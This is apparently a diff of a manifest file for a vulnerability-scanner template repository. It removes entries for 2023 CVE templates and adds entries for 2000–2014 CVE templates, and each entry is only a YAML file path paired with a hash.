-http/cves/2023/CVE-2023-26843.yaml:3f2aa43def8b8b49bf6bfe2912482543c1eba1fe -http/cves/2023/CVE-2023-27008.yaml:2bb53213d54d4fbc6a2b47fd9220837a87786139 -http/cves/2023/CVE-2023-27034.yaml:e9686c44c49a7f3e4611248573998c469c75d76c -http/cves/2023/CVE-2023-27159.yaml:71c569f1cdfa1399c636db910773731861a69d30 -http/cves/2023/CVE-2023-27179.yaml:1235b5113d0e2ad3148aa7d85fd5cd4a6dd637fb -http/cves/2023/CVE-2023-27292.yaml:f21dd96ae6e460fd9db09c27e918e866d0bdfc17 -http/cves/2023/CVE-2023-2732.yaml:fa1895eed642df05ea7cdbe0c4f41a7d3a0b7d1f -http/cves/2023/CVE-2023-27350.yaml:5fc88b82f341715b4043b05174cde5d9391c777d -http/cves/2023/CVE-2023-27372.yaml:84734789c506b69fb0ddb28675ff1905648d54bc -http/cves/2023/CVE-2023-27482.yaml:03e44de2c77b66b5d9c4ba0e890f19bcbeddb750 -http/cves/2023/CVE-2023-27524.yaml:b9d50afe9c5b0b8b4a5a737bc0abb45aaa54c931 -http/cves/2023/CVE-2023-27587.yaml:913c5342f26ccfdb49e58580d2dcdb2a24749985 -http/cves/2023/CVE-2023-2780.yaml:6abba01d77fae0242e4abae3a1c7ff359f01e99c -http/cves/2023/CVE-2023-2796.yaml:73981c956bed79920842d8664a36752ab0975b35 -http/cves/2023/CVE-2023-28121.yaml:a49cf47c5108f8c2413b3d1691feda5919c9db4d -http/cves/2023/CVE-2023-2822.yaml:3c317155ff0a93dac882803a54c44831f8a07e1d -http/cves/2023/CVE-2023-2825.yaml:54f87370c7aa9051c0a55386f311bc0f51611e3a -http/cves/2023/CVE-2023-28343.yaml:22fba53682aab2b23f2011b34f6152a39f4781cb -http/cves/2023/CVE-2023-28432.yaml:b804da99b9527c12e0930f0b370aaab36dac0ea2 -http/cves/2023/CVE-2023-28665.yaml:4ab9b1063f86a8bb06e3727bee2cf7f515c8dcbe -http/cves/2023/CVE-2023-29084.yaml:64bc49f4ec88538a19fd6203a01e593fadcfdc50 -http/cves/2023/CVE-2023-29298.yaml:067baaf0f4b2b6b8849012231667b05870f35f3b -http/cves/2023/CVE-2023-29300.yaml:293a5c19421cb99a6449960c84a02ff4fece6611 -http/cves/2023/CVE-2023-29489.yaml:a4ff843ed5d96e5ecd42dabfc9cf029647eb8834 -http/cves/2023/CVE-2023-29622.yaml:f493db7f29fac30c03e1c88a5bd38f95f48ca535 -http/cves/2023/CVE-2023-29623.yaml:0975fe6fe88e29c8bc886fefd973fd5f4e6d1c3e -http/cves/2023/CVE-2023-2982.yaml:78ba8b6e9c33112e6b20fdc9974c273a9fd2db4a -http/cves/2023/CVE-2023-29887.yaml:2e57f96b287e88a981eff7fd79dda0c48191bd26 -http/cves/2023/CVE-2023-29919.yaml:d52c7480f077a8cec40acae99c190598ee0ee815 -http/cves/2023/CVE-2023-29922.yaml:7089e6695c1d5d0677993590bed675c32f54c1d3 -http/cves/2023/CVE-2023-29923.yaml:79dd6e6a731b9e903119c8293ec3e361a8dc8687 -http/cves/2023/CVE-2023-30019.yaml:04621b3933295f88729a0c38d6fe4fd2bce14772 -http/cves/2023/CVE-2023-30150.yaml:b3fffa3def3375bb0979208556a1a05870bf7073 -http/cves/2023/CVE-2023-30210.yaml:124b0fe201f3759cc9789aea356f97ca86e98890 -http/cves/2023/CVE-2023-30212.yaml:00f332e55a90bb3f6fc439fbd8c240289ce19aef -http/cves/2023/CVE-2023-30256.yaml:07f00147876593903d51cb62b3f4eeed0ca8904c -http/cves/2023/CVE-2023-30777.yaml:7ba88c7bd2e78e0ec4fdbf1556fbbc09ac6a75c8 -http/cves/2023/CVE-2023-31059.yaml:02c3199020f06a47e056ed9b010ce2181cc4714a -http/cves/2023/CVE-2023-31548.yaml:32c2cd73ad4f5b1ad4c31369a11bf54d08dd37a8 -http/cves/2023/CVE-2023-32117.yaml:67ad86854b9b61686eb95d44e2bd84ea92ab7336 -http/cves/2023/CVE-2023-32235.yaml:5179bcaa3e923b432b765b6aa7af3101325ad96b -http/cves/2023/CVE-2023-32243.yaml:54f2c499c0f556258b48402171b990d1871338b7 -http/cves/2023/CVE-2023-32315.yaml:a96e4cb9fa66937091e2c35d506a96695e031471 -http/cves/2023/CVE-2023-32563.yaml:c6850b6b2fa956cd1bfc83bcefa49b23cc64e864 -http/cves/2023/CVE-2023-33338.yaml:074ef93528b87c080261bf5826b51f8a719745d5 -http/cves/2023/CVE-2023-33439.yaml:dad029b5578b5b10a33aa7895320a5ba09dc711f -http/cves/2023/CVE-2023-33440.yaml:ac4b8035e3447dc9ca4b34701840685765b2ba6b -http/cves/2023/CVE-2023-3345.yaml:47112a8963d8c8936893df44361054941b8f85d2 -http/cves/2023/CVE-2023-33510.yaml:3f1a1ebef524c1b2c3fcc7b55a74b83ed307808a -http/cves/2023/CVE-2023-33568.yaml:cc1c894d0eda2d9e933c1c4d3dd77ec183088a45 -http/cves/2023/CVE-2023-34124.yaml:81375961c8ea77ee95e568dc32da741baf26b640 -http/cves/2023/CVE-2023-34192.yaml:8affac232592b125b819252a29ac21b5e6f40b05 -http/cves/2023/CVE-2023-34362.yaml:38ddc6acf7bdc5eb06a1a208ed46b78cb90ac975 -http/cves/2023/CVE-2023-34537.yaml:af1f6f1b75cbe52301492b19597c4cccc2f66613 -http/cves/2023/CVE-2023-34598.yaml:23564a66d1936420fd3d0182fee3932b48541ead -http/cves/2023/CVE-2023-34599.yaml:873bfdf6b993e9024ed1f702819be25fd4633c7e -http/cves/2023/CVE-2023-3460.yaml:17032ba0261ace889d0cf792134f83a860f8b691 -http/cves/2023/CVE-2023-34659.yaml:84f2be1ef4991b8fcec1b22898c1aadad75da0fd -http/cves/2023/CVE-2023-3479.yaml:ff5e39c8bae49ab9bb56201bd8a03c6ef76df0a3 -http/cves/2023/CVE-2023-34843.yaml:376e512829df739d8b1bf564037002eb8b700065 -http/cves/2023/CVE-2023-34960.yaml:11e2daecc7e3c53c42ee3783f95a5ac63e8ccfd6 -http/cves/2023/CVE-2023-35078.yaml:6ba16396ed5b5a17ac2d7c834d08773b6c1786a8 -http/cves/2023/CVE-2023-35082.yaml:073c8d815e2f3a14579fc207d74ba2cb6f2e1ad9 -http/cves/2023/CVE-2023-35843.yaml:fca3960d8a6f428644805fbc175f95f1070a05db -http/cves/2023/CVE-2023-35844.yaml:dead702bde9d82d587595fb889c553e428abb143 -http/cves/2023/CVE-2023-35885.yaml:59b01c450238e205a49a3dbd1ae76c60e2524328 -http/cves/2023/CVE-2023-36287.yaml:7254cdb300670a7543b934dec29169a4a35fc381 -http/cves/2023/CVE-2023-36289.yaml:32cbf8550d709b9fda4726770ce20f78b581cd9a -http/cves/2023/CVE-2023-36346.yaml:3f0cc0b1e8fbd0fdd7f09109b818fa9aff9f43ed -http/cves/2023/CVE-2023-36844.yaml:58fd0f0c0ffda35c4a7611c076d176368fa320d1 -http/cves/2023/CVE-2023-36934.yaml:bdcafe2e6ab60e299f6593dc4dc98cc08afb8ae9 -http/cves/2023/CVE-2023-37265.yaml:a4492a1b597f7884ea4da2fca7acc1a30700da04 -http/cves/2023/CVE-2023-37266.yaml:30b49350fc02409c32cfbe848ebebd8aac294857 -http/cves/2023/CVE-2023-37270.yaml:b4d86307127e1c5e14f2aef3c53ef0fdcbf9b71a -http/cves/2023/CVE-2023-37462.yaml:af1c3104a654f43ddba4fb40e09aee67c2e45f66 -http/cves/2023/CVE-2023-37580.yaml:036705ad268578c9a8f9bb45fe226fbf7807ab0b -http/cves/2023/CVE-2023-3765.yaml:5399e0d266ee8b789e41ad6d68aea0fd0c0612ec -http/cves/2023/CVE-2023-38035.yaml:0dc31fc8d3d44bb3ea07680f340141cfefbbba37 -http/cves/2023/CVE-2023-38205.yaml:5a8c9cef0b1f746046eb0576c605535003f0a279 -http/cves/2023/CVE-2023-3836.yaml:f9c2a0f31ec00a1b0fb80f52ea3c8c64431a9a93 +http/cves/2000/CVE-2000-0114.yaml:7986ab520471d2a5112387c04bbe34502eedaee6 +http/cves/2001/CVE-2001-0537.yaml:684d968653d3ca2d1bd80988757e97d889675dc3 +http/cves/2002/CVE-2002-1131.yaml:3ea1cddb7f10d31c238cd3f9afc70e8fba4edc80 +http/cves/2004/CVE-2004-0519.yaml:3cb991ff94e0d1f2568bcf5cedad19b5e23190cd +http/cves/2004/CVE-2004-1965.yaml:8795cc5334701433633da3210063bae8ac9ebcea +http/cves/2005/CVE-2005-2428.yaml:f09a0137d79f2ec0c805db2e553eec8b1eac0f49 +http/cves/2005/CVE-2005-3344.yaml:682d4c8c14407ec9846d463c10537dcb0c06b438 +http/cves/2005/CVE-2005-3634.yaml:15bcb0a531ad200bbbc77b4475c3e77e92dc1c7f +http/cves/2005/CVE-2005-4385.yaml:ab2caa04a9f2484564b5415373e12f4896e3e884 +http/cves/2006/CVE-2006-1681.yaml:22a4cb9f05bdae530895b454b195585316096992 +http/cves/2006/CVE-2006-2842.yaml:91b5841a1cc84bd1de5c19abbfbe49b23079c6fc +http/cves/2007/CVE-2007-0885.yaml:c77fa82c913ae7cb5e33f7088505953ba6c35cb7 +http/cves/2007/CVE-2007-4504.yaml:4b0405dbdfb4c50b3eb39b6280eddc720964f74b +http/cves/2007/CVE-2007-4556.yaml:508b8ab81b0e34e80ff5ac62af75795ce56688ac +http/cves/2007/CVE-2007-5728.yaml:b2d5b723fb89c46b2c67d0383945c1a023c7c1e6 +http/cves/2008/CVE-2008-1059.yaml:49ee404aa3aa4b2e08b2ecc581d81748c5aaaf39 +http/cves/2008/CVE-2008-1061.yaml:9ca0cccab87ce5972977914a027c64c29cda7dd0 +http/cves/2008/CVE-2008-1547.yaml:42191a44e34a9ec460e08b8523ec90204f57824c +http/cves/2008/CVE-2008-2398.yaml:bb8f6c7cf5153854f0fde9f85190faef8aeb67ac +http/cves/2008/CVE-2008-2650.yaml:db392a84ebf5b025b5f9519b72b2e20e7ba0162c +http/cves/2008/CVE-2008-4668.yaml:b44ee9ae90d2c9cc6eff17701b3ea58ea8aa24fa +http/cves/2008/CVE-2008-4764.yaml:22519d608aaef9a2ffb5811eacd4b72b33c78bbc +http/cves/2008/CVE-2008-5587.yaml:17511af1d032b0fbd8e6af5547b2f6e71b75d99e +http/cves/2008/CVE-2008-6080.yaml:6ea691d57aff56756fb250c4b59262518f852683 +http/cves/2008/CVE-2008-6172.yaml:978ea5199d640b2fe83ec8e57e20e4e4168dc4f0 +http/cves/2008/CVE-2008-6222.yaml:a122c1d433a48600c95ce0d4d22e1b9e578439d0 +http/cves/2008/CVE-2008-6465.yaml:0ce4cf448ee88afb7e9ead11b5357f822edf2644 +http/cves/2008/CVE-2008-6668.yaml:5ab1457a450aa61b24b4a10819b3124fd6b6f358 +http/cves/2008/CVE-2008-6982.yaml:899789e6ac96b49651359b4e75fde6c0377a2330 +http/cves/2008/CVE-2008-7269.yaml:9d14fd5400ea254b2e097e08264bebbfb4a9113c +http/cves/2009/CVE-2009-0347.yaml:160ae96ecba13c5a6200c4754348daa3b9f2faed +http/cves/2009/CVE-2009-0545.yaml:326435c9b1bbda25a9a6860837d1450828988407 +http/cves/2009/CVE-2009-0932.yaml:c3e3b8654b6887b2a529db0f172231f29b5ccb8d +http/cves/2009/CVE-2009-1151.yaml:e203af6dbdaad48caa9b24d7b437717eade70985 +http/cves/2009/CVE-2009-1496.yaml:f42e42b670e5c4f92af59a153e1b95637aab7de8 +http/cves/2009/CVE-2009-1558.yaml:9a65040d36f58c6500e99923c85ebf6f4019ee80 +http/cves/2009/CVE-2009-1872.yaml:ec7158e2bbc0bfb4b8eaada831058bf4e1258fa8 +http/cves/2009/CVE-2009-2015.yaml:f4167ff28d8512a8b4fd36c0f4288d25b5adcaa0 +http/cves/2009/CVE-2009-2100.yaml:eaaf2cb3e24238816bfe4ef93ff65ee7cf0b1bf3 +http/cves/2009/CVE-2009-3053.yaml:be2b5ec43159207d00746f097c8ee1da66221172 +http/cves/2009/CVE-2009-3318.yaml:3f94f43b662b55321ffa71fce26b04054fe03832 +http/cves/2009/CVE-2009-4202.yaml:f93b9fcad96e84f0ce07997ae4ed7f069017a99b +http/cves/2009/CVE-2009-4223.yaml:ac4369fd879815ff486f835978e8cd639f3931c6 +http/cves/2009/CVE-2009-4679.yaml:bd8ff06cf0d858eda594092d6fa2198c6f00fb58 +http/cves/2009/CVE-2009-5020.yaml:0829887b08aa18187a1e8e0881da215bda683fe8 +http/cves/2009/CVE-2009-5114.yaml:bc1da5d51783695c5de927979595156f4d796b2c +http/cves/2010/CVE-2010-0157.yaml:9791175c8a2d97ecc5d1dcacaaa3927c2529acdb +http/cves/2010/CVE-2010-0219.yaml:60d9d71b5b2843b47a3105ebca2990b6495f6a8e +http/cves/2010/CVE-2010-0467.yaml:821ba33328d83b2abad7345a9bd1891f0936e475 +http/cves/2010/CVE-2010-0696.yaml:7116ea6d3c3364573b7bc9fb7b4c1bfd131be33b +http/cves/2010/CVE-2010-0759.yaml:db75e2e9d96121841e151f8e939516ad0964064e +http/cves/2010/CVE-2010-0942.yaml:9834db760c989ff29ca411cf9c2039ed4016909c +http/cves/2010/CVE-2010-0943.yaml:6615878a23b4c7b7926e2ca2ee16e375cacc855b +http/cves/2010/CVE-2010-0944.yaml:9926ddcc3f8edc3e94f790d96cb846cd0bdb5ff2 +http/cves/2010/CVE-2010-0972.yaml:85a53f55f459451b39dd070b243055c135e70e2b +http/cves/2010/CVE-2010-0982.yaml:e53917ceb3c28732e341a994d189d4051174254c +http/cves/2010/CVE-2010-0985.yaml:1b9c4cc69e604f28a83680286d9bfaf806b39580 +http/cves/2010/CVE-2010-1056.yaml:3ec1c1b703922e30cd8b3ecd6f35bba6967af79d +http/cves/2010/CVE-2010-1081.yaml:060117c29d069e5f57dae24a8c56630d202ceae4 +http/cves/2010/CVE-2010-1217.yaml:43126e2098ec63fe36fc8853bc279f5fb734e9f3 +http/cves/2010/CVE-2010-1219.yaml:0da0dedc4562aacd9334e811a80c3d8134e4b09a +http/cves/2010/CVE-2010-1302.yaml:293238b004c1be1c1ce042bd66ee05938baed0ee +http/cves/2010/CVE-2010-1304.yaml:87a26ef92b89c954329272e026e39579f6ddbb19 +http/cves/2010/CVE-2010-1305.yaml:7ec6247050fbe690b6c593657fe5ec0b291db026 +http/cves/2010/CVE-2010-1306.yaml:42dd35f3256770f225ae13d023bdac61087d4cf1 +http/cves/2010/CVE-2010-1307.yaml:dba32d1e732a727531a7698fdaa9b64ab70428b5 +http/cves/2010/CVE-2010-1308.yaml:107879633313147fc9ed0b4d7e5a83955fab8f4f +http/cves/2010/CVE-2010-1312.yaml:a53e7da50c96f78c2d16a75291596cfe57329a7c +http/cves/2010/CVE-2010-1313.yaml:854d644094a39587643dac01d21ba259c99d44b0 +http/cves/2010/CVE-2010-1314.yaml:54e091c5d0acb5bb96ec45d2a44340f16c70d170 +http/cves/2010/CVE-2010-1315.yaml:ad6cfb9894d3bc86cde4af40c42797175697bc18 +http/cves/2010/CVE-2010-1340.yaml:d72f0a049cb945fac1f1cee9b2871fb200c83a08 +http/cves/2010/CVE-2010-1345.yaml:dd03e24926483a564c206b4cf9be7f672589eab4 +http/cves/2010/CVE-2010-1352.yaml:1ec9f4a2413a5d14f5da44b87c44afe09b30e7f0 +http/cves/2010/CVE-2010-1353.yaml:ba3a177661d2a49318223862e831740aaf02787d +http/cves/2010/CVE-2010-1354.yaml:72ebd5ae43230aeeb79a0dfce2f6ed348c7d3660 +http/cves/2010/CVE-2010-1429.yaml:5b04c1eb188852725a4937bf6a7bde68912dcafe +http/cves/2010/CVE-2010-1461.yaml:8d8f1046e82e4b1cd25a9db5caf24c2422aa9c85 +http/cves/2010/CVE-2010-1469.yaml:0f82926b7a40ae6a7d69127b0eab1b7aabcbb663 +http/cves/2010/CVE-2010-1470.yaml:3e79f37deca242db6a8a3a4fd34cbff6c43381e8 +http/cves/2010/CVE-2010-1471.yaml:b95f68a1ad9ab059656bd44060519df9b9a33d3b +http/cves/2010/CVE-2010-1472.yaml:58c99734eacb837b912951ec56db116a10804848 +http/cves/2010/CVE-2010-1473.yaml:16acf4fc7d7e705f6fe4cfa4f4abc86a4e2c8575 +http/cves/2010/CVE-2010-1474.yaml:edc1cf80c87bf32bf10402c3d447018ffc5dd730 +http/cves/2010/CVE-2010-1475.yaml:74330140a5b6fa855b5b39b90e833de2da36d30c +http/cves/2010/CVE-2010-1476.yaml:a29a974a2355882f4b240564f59b497471a75bae +http/cves/2010/CVE-2010-1478.yaml:14cd7a59776bfcd12e6e81c59300f08aafd9e959 +http/cves/2010/CVE-2010-1491.yaml:1924f85b9bbe77b53e1caa0bf1e0e2d55a48ad29 +http/cves/2010/CVE-2010-1494.yaml:e752951d77e0667bccfc284b074e62fbd899a714 +http/cves/2010/CVE-2010-1495.yaml:b5f2b4ee81797b5fcc793530d45098a55bb74146 +http/cves/2010/CVE-2010-1531.yaml:8ef5b74089ade45fbea78bbbffe0b1d2ad5952c5 +http/cves/2010/CVE-2010-1532.yaml:94bf2c4fb22ef01e1449ce3032eb6b39eb06fbf8 +http/cves/2010/CVE-2010-1533.yaml:1874adf300f48337fad38b68c691aaacfefd333d +http/cves/2010/CVE-2010-1534.yaml:c5d248d42b7440df7561dd10a637c799a8f5115b +http/cves/2010/CVE-2010-1535.yaml:5625c3965fce2e21639d003bfb6b5741bf39fe55 +http/cves/2010/CVE-2010-1540.yaml:d13a5d3a39cd09544c269beef8eed843f832d04b +http/cves/2010/CVE-2010-1586.yaml:0cd63171ff06eeebcb975d615b1ae49a00a71832 +http/cves/2010/CVE-2010-1601.yaml:e1cf2f7c90716d6a0283d7427604018efceb29f5 +http/cves/2010/CVE-2010-1602.yaml:942d9313f407313e1ec13063e48c686997942cb4 +http/cves/2010/CVE-2010-1603.yaml:3830392b56910a2aebe5d1bca87c440b57e2ded5 +http/cves/2010/CVE-2010-1607.yaml:2c52fa8326f334069ebc69cb89addeffb90adc1d +http/cves/2010/CVE-2010-1653.yaml:d7196b19e0e2114fe2506b2d58d0c5c1358b4852 +http/cves/2010/CVE-2010-1657.yaml:9237eea0d378dedc1a587b93c3bcbf099f0fc9cc +http/cves/2010/CVE-2010-1658.yaml:e0ea72dba001636822e01fc41d2bfd9efef93d70 +http/cves/2010/CVE-2010-1659.yaml:8017a24068afb7ef4bf5ea7d552d2b53e50b117c +http/cves/2010/CVE-2010-1714.yaml:dadca087213f99875a80ad64123ed27ff150d961 +http/cves/2010/CVE-2010-1715.yaml:ebd482906b8bdd1b915d80717cebc5379f880cfb +http/cves/2010/CVE-2010-1717.yaml:19f7321486b1a3ffb3dea0759eb787ab762a6d18 +http/cves/2010/CVE-2010-1718.yaml:35d8e629acc174f2d47291ed662f39e3375fe465 +http/cves/2010/CVE-2010-1719.yaml:84cb84e662d1f4e3666fd7b731d9414ce123d49f +http/cves/2010/CVE-2010-1722.yaml:ff45f4425c36c2910ab6c7893d55735d04861a82 +http/cves/2010/CVE-2010-1723.yaml:f3ac2505c2cee7420d5192f3f5c0b32e211abf44 +http/cves/2010/CVE-2010-1858.yaml:eb5d4f0926fa102ffa86e1d18cb6d623a361dcb8 +http/cves/2010/CVE-2010-1870.yaml:724628c4005b16aad6600dd97261368e761c445a +http/cves/2010/CVE-2010-1875.yaml:b34748e23c5f6d6cc1f9176e7a5d96c90845aba7 +http/cves/2010/CVE-2010-1878.yaml:408923e5d7826dc96df7fb831bd919be2623f348 +http/cves/2010/CVE-2010-1952.yaml:f7cbe49630ef6ab040d8171487dfef739d3d5cc3 +http/cves/2010/CVE-2010-1953.yaml:98f6ddf5a5b67c7a4e8f0a5c536780ba1162acb2 +http/cves/2010/CVE-2010-1954.yaml:f509b3316ca5758a375fca2ef12d55b20ea8f8de +http/cves/2010/CVE-2010-1955.yaml:fdc0a20eff91556c50d6a69f5633549056c72c4d +http/cves/2010/CVE-2010-1956.yaml:9035a357a24081f598a2d13381abb5a85f17d2e7 +http/cves/2010/CVE-2010-1957.yaml:04076bf48e034e209f500eb757341be709e24a23 +http/cves/2010/CVE-2010-1977.yaml:0f547381dc8dbc6dc402844cfecac5ec97e4de85 +http/cves/2010/CVE-2010-1979.yaml:8aca3ebf39d71bd418c321a8ebe154191f5230f5 +http/cves/2010/CVE-2010-1980.yaml:95fae94d044c46a8b4488bdafac3011382048a0d +http/cves/2010/CVE-2010-1981.yaml:827ea4bd371fec2073cce20838cc97efedc60918 +http/cves/2010/CVE-2010-1982.yaml:9d36b0b7cb09a98b6a335e994e60a63570ccfc6a +http/cves/2010/CVE-2010-1983.yaml:e78cd12e64bae13349a8e28c59b2902a1a3f0f20 +http/cves/2010/CVE-2010-2033.yaml:bbdcc2bc99d54540c64a464783d085e01b7736b6 +http/cves/2010/CVE-2010-2034.yaml:5496097994a99d1a764b8471d0ca9b43274c0402 +http/cves/2010/CVE-2010-2035.yaml:a5fc42a3623799a3bca1b897d78bf4f61fd2f9e3 +http/cves/2010/CVE-2010-2036.yaml:7ccf2107885b2218fcf15cce48f82ad9b7be51bc +http/cves/2010/CVE-2010-2037.yaml:8d9cdfb7d1745298a751fc3de086b07014432ba6 +http/cves/2010/CVE-2010-2045.yaml:0fd71d6f5febbd8e4bb9d1f6b4079d3c0977ae73 +http/cves/2010/CVE-2010-2050.yaml:60ca778c4882b187134684a7b67a926aeb3a8157 +http/cves/2010/CVE-2010-2122.yaml:6fda7522e438e79c9bcfd7204d9378f73ad56a82 +http/cves/2010/CVE-2010-2128.yaml:56ac82e298fd943ded1032cb093b6cb1d748af3f +http/cves/2010/CVE-2010-2259.yaml:47b98277db8fe907c939871f2d1078ad72ad03ed +http/cves/2010/CVE-2010-2307.yaml:b12d89e9131642f537341688a741fb0d77c5b630 +http/cves/2010/CVE-2010-2507.yaml:c6626e7abb25d94760d2d8f0876f6817e6e87cae +http/cves/2010/CVE-2010-2680.yaml:ca2e3458dc1e856a44f4ee00101dcc8a5651e9ea +http/cves/2010/CVE-2010-2682.yaml:efbf916e14eab5c0209655f735178a444687cc50 +http/cves/2010/CVE-2010-2857.yaml:e9a412b32a9afbbcea65f4d02f4d00964856e899 +http/cves/2010/CVE-2010-2861.yaml:3146e21f95f392d0c1d23e6d774864497242ef6a +http/cves/2010/CVE-2010-2918.yaml:44821c52bf57c90f9622164c7df7ec051b7053b7 +http/cves/2010/CVE-2010-2920.yaml:f3f89d424cd9c36316fcf3edff1fd5c69945dad9 +http/cves/2010/CVE-2010-3203.yaml:be1eb788f56e8862a0f7630fc5219b8969c996e5 +http/cves/2010/CVE-2010-3426.yaml:e5401e35fe465597712b6c3a1d992da15d99f5ee +http/cves/2010/CVE-2010-4231.yaml:03516ec49ab54932797e88ba384784383f433343 +http/cves/2010/CVE-2010-4239.yaml:c2fd33acf97db90c99f5b583594efc74f9eca996 +http/cves/2010/CVE-2010-4282.yaml:d781bdfdb001724ab2402178e0f2fda9a8850c01 +http/cves/2010/CVE-2010-4617.yaml:d589f246e76aa6d0a8bf83f135afdbe8a6d490c6 +http/cves/2010/CVE-2010-4719.yaml:36dc52f8ccaeb3f561ba04aa323aa5e558245941 +http/cves/2010/CVE-2010-4769.yaml:d5832f7a7e11917b38d5c2f8a33cec9e3489654a +http/cves/2010/CVE-2010-4977.yaml:c74c911931b63dc75b8ccc7376db38fb4452d1c0 +http/cves/2010/CVE-2010-5028.yaml:70e8d7f011fd2011135cea29119b8598ce5a83fc +http/cves/2010/CVE-2010-5278.yaml:cfe473e5b3dd4d85f48309197eed75a3d33ca99f +http/cves/2010/CVE-2010-5286.yaml:b0b98be051112cfd4ab2a97a25b24ee88a8a2eae +http/cves/2011/CVE-2011-0049.yaml:1d4111e8eee6d040e02e6a53569bc50bae5c56f6 +http/cves/2011/CVE-2011-1669.yaml:54498ef64f209a5ab4e6def8bcd6a0a4f4d066aa +http/cves/2011/CVE-2011-2744.yaml:7af78e3526d54563edfdd993abe3f3170f47e85f +http/cves/2011/CVE-2011-2780.yaml:84da38914baf8a87477acb0da70046105ab915ae +http/cves/2011/CVE-2011-3315.yaml:d661948d187582ea94d1a47abf4037995929ae36 +http/cves/2011/CVE-2011-4336.yaml:93c330d3d7f96c86ad9ff7cd4099f2e634b1cf41 +http/cves/2011/CVE-2011-4618.yaml:712d0b96601bf34fb109a12f70216c1eca840e9a +http/cves/2011/CVE-2011-4624.yaml:dc55c5a50281fffc0dd5e20abacb9ccce2f33bde +http/cves/2011/CVE-2011-4804.yaml:8f20c287147f1eb5929b730de7dba45204008046 +http/cves/2011/CVE-2011-4926.yaml:ad66bbf5b553544ddd484d653c96b6f274733918 +http/cves/2011/CVE-2011-5106.yaml:5b8957dd3464e114fe98cd319a1b0098960844f9 +http/cves/2011/CVE-2011-5107.yaml:7128e825c89b23fe088bdf250f520293275eeec5 +http/cves/2011/CVE-2011-5179.yaml:3007bedee85bf959cdc0deabef782cce30ae27a2 +http/cves/2011/CVE-2011-5181.yaml:5d49fdc7b6293197117af8c6b2c73ca9268b3e13 +http/cves/2011/CVE-2011-5252.yaml:777a90f34e8f28b8912f656ec2f28c162deb2350 +http/cves/2011/CVE-2011-5265.yaml:9d9e9a3c198c3ce710377e44904f8fb0e6c0477e +http/cves/2012/CVE-2012-0392.yaml:f6d82d22880c374db3f692944d1ee346be18a56b +http/cves/2012/CVE-2012-0394.yaml:9590ec8610a8520efbc0b01cb80ed80b03a4bd97 +http/cves/2012/CVE-2012-0896.yaml:5fd4381989a203fdc6ff76823151f979c243a62a +http/cves/2012/CVE-2012-0901.yaml:346416f32d41213b420e28bc9c25046dd8151429 +http/cves/2012/CVE-2012-0981.yaml:f8955a0c5c5f57ee90df938df2bf4e41bdc1a0c9 +http/cves/2012/CVE-2012-0991.yaml:4139a3eb5c57cea2d6329e884ee0cf8f37bf07db +http/cves/2012/CVE-2012-0996.yaml:cde939eb74fe57ccffa47c7f10853e75d1eeb9b8 +http/cves/2012/CVE-2012-1226.yaml:e92919d80a25a886c593ca4b642172f4c027e1b2 +http/cves/2012/CVE-2012-1823.yaml:2c71630fc4009a0bc12b970a1eefd87785f3537d +http/cves/2012/CVE-2012-1835.yaml:41ad4a5f5ca558cf26f4457921fd2af86eede682 +http/cves/2012/CVE-2012-2371.yaml:b00c688ed7ac14346850d872b84a44d5cd310bd9 +http/cves/2012/CVE-2012-3153.yaml:60310007d312db077bb85df7f23560fdb98dc604 +http/cves/2012/CVE-2012-4032.yaml:70dea69e2fa23acd740f459ac9ae7f4cb3ee3827 +http/cves/2012/CVE-2012-4242.yaml:e6a4b43e4ca46d0f1e734239e550aa7d1123cc87 +http/cves/2012/CVE-2012-4253.yaml:d2b2d535a202237b2070bb1e534480d99e3f7a32 +http/cves/2012/CVE-2012-4273.yaml:9a82261060d52bdf360b8b715f9576d68b865c1f +http/cves/2012/CVE-2012-4547.yaml:a8386d18eecebee7549378e575771eef525055ef +http/cves/2012/CVE-2012-4768.yaml:f24c139cbb94ad5a7276120ad3e4953d03fde6ab +http/cves/2012/CVE-2012-4878.yaml:39665c90f929603cbe427cf583d8c7c26a0ee684 +http/cves/2012/CVE-2012-4889.yaml:b5f1b7e57c5c54a961b0d908edd78a0f0415b55a +http/cves/2012/CVE-2012-4940.yaml:5a3d6197760c3017cc15c123ee4d17f4d9e936b2 +http/cves/2012/CVE-2012-4982.yaml:8814a723afd0775c7a71178f116964ae1d277cb3 +http/cves/2012/CVE-2012-5321.yaml:f8aa316206928b88a9fc762f5ab4631730691639 +http/cves/2012/CVE-2012-5913.yaml:1f8bfeb6ee96f6192093dc024fd282df4f6e0cca +http/cves/2012/CVE-2012-6499.yaml:4aa2268751596debebfc3fe508c46ae7d2fd8ba0 +http/cves/2013/CVE-2013-1965.yaml:02f9b07860898b4c5f5fa1221f34ef1bab0921b2 +http/cves/2013/CVE-2013-2248.yaml:4e63be3257ee69f165fd90f8a9bf9c3c5dfbcc30 +http/cves/2013/CVE-2013-2251.yaml:84d673d41803fec5d4356aa1a23105c9322ead5e +http/cves/2013/CVE-2013-2287.yaml:b42e4089ebd82bb3bcac5ef20159eec1fa7654ed +http/cves/2013/CVE-2013-2621.yaml:ea2ff0285cf1ba1000fff6230efde768e236ad28 +http/cves/2013/CVE-2013-3526.yaml:d6f6a5251dfc6fe54117d1493c614a07030498bb +http/cves/2013/CVE-2013-3827.yaml:84dd377dd03f8204cf7e3f961a048816c82ed421 +http/cves/2013/CVE-2013-4117.yaml:f0ebbc38292470a56a9f9a3aca39705233eb201a +http/cves/2013/CVE-2013-4625.yaml:bc1d401977043bdd433e12fdf8772fe2b1f48c05 +http/cves/2013/CVE-2013-5528.yaml:cd691c6115edc07924b252cf6dffbb701a3e86f0 +http/cves/2013/CVE-2013-5979.yaml:b2b2a19a40084f2425f5d8546430df51230cb9ea +http/cves/2013/CVE-2013-6281.yaml:2434da8abe33503d2da20aad5166875337b71b29 +http/cves/2013/CVE-2013-7091.yaml:bde1e2eb0dd783187b6a323099ccff0ec2be1c23 +http/cves/2013/CVE-2013-7240.yaml:023221d770604fe8bcd0d1636b27dbb4c6ea5493 +http/cves/2013/CVE-2013-7285.yaml:0697c8b6e1c196784822491824b7ec2a899e3ebe +http/cves/2014/CVE-2014-10037.yaml:1d5379797c6e5c4646b10da4ec01e13ace369356 +http/cves/2014/CVE-2014-1203.yaml:ce9269880e56e75e56ae5ba0999413e141ffdc5d +http/cves/2014/CVE-2014-2321.yaml:4929344bd8b1b3f5149f16300d931c8cee202b91 +http/cves/2014/CVE-2014-2323.yaml:d197b0e8226c00a21a94bc9be25c2aab9305c753 +http/cves/2014/CVE-2014-2383.yaml:a20fcc8f573e001f79d2a318056cb465c6cfcafc 